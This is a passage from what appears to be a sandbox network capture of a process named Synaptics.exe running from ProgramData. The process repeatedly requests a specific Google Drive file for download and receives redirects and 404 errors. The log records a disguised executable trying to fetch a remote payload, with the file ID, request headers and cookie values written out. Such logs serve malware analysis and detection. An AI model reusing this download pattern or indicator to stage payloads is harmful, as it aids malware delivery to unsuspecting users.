                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49711 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:10 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
2024-12-30 09:58:10 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC663tgRnkqqN787wYQ3matvlwMsm5wevAfHC0S5rpdEh5DDnXrgF4qXbAR8WR5q7adbtZSHZDg
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-QxegUZUaDyF2AlpyjvksSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Set-Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD; expires=Tue, 01-Jul-2025 09:58:10 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:10 UTC | 1602 | IN
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hkhM97eO5ECutqh69qA_Tg">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 09:58:10 UTC | 50 | IN
                                                                                                                Data Ascii: is server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49715 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
2024-12-30 09:58:12 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:12 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MMgcadZ8VtivJMlYv8SVLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49717 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:12 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E
2024-12-30 09:58:12 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7MB96Lkeyx-FmIhD6UNY6xLL_0ATJUp6WjydE2YeNEHkUQghgIaSY9soQegw1aSSV-zNCBMEA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:12 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-CxH4l8hdfzGl71dsvLTM4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:12 UTC | 140 | IN
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 09:58:12 UTC | 1390 | IN
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="on0wzPLAWiufC8yM9E3EoQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 09:58:12 UTC | 122 | IN
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49714 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:12 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E
2024-12-30 09:58:12 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6NMLRHlDvMCwZgKHVP5rlVmEhMYQ4sLEMPkEYhfyx5db-ZyxVKrkD84OTppLFQVmvoa2NDs3Q
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:12 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ORfyBdHrLrMdeY0qdqHFzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:12 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:12 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="jMvfSFYgXjG5dvsfUglQ6g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:12 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                9 | 192.168.2.7 | 49716 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:12 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:12 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MxGlGe4BEUQwQDGoli4ezQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                10 | 192.168.2.7 | 49723 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:13 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-iK7X0lJQkp6X2_vUllN1kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                11 | 192.168.2.7 | 49721 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:13 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VpdX3cAHUnOdsJos9p2uLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                12 | 192.168.2.7 | 49724 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:13 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:13 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5AOL74zv-hlk21_mu6JxTLEASaWA00KGlRxggioFhkrSNgbvC1B6yH_UyI_vR1X4xEN9QCbuc
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:13 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Ok5LwymeUelLvwC6aVTEnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:13 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:13 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="AdBUf5KfuW4Sg3Vt0xCHHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:13 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                13 | 192.168.2.7 | 49727 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:13 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:13 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6XGEDuor3Rsh9ZrXcNbgz8MfekLoJTosk-7HBTA4vzKwT3JPsUaK5ouyhHXwTWp7Y2sOkQsQo
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:13 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-xTW9A0qlftiWXYHqlji5Xw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:13 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:13 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="j12NTkCFLCCGyIYOw4IcdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:13 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                14 | 192.168.2.7 | 49736 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:14 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:14 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-lWyhDCae8cGWaube2WQTyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                15 | 192.168.2.7 | 49737 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
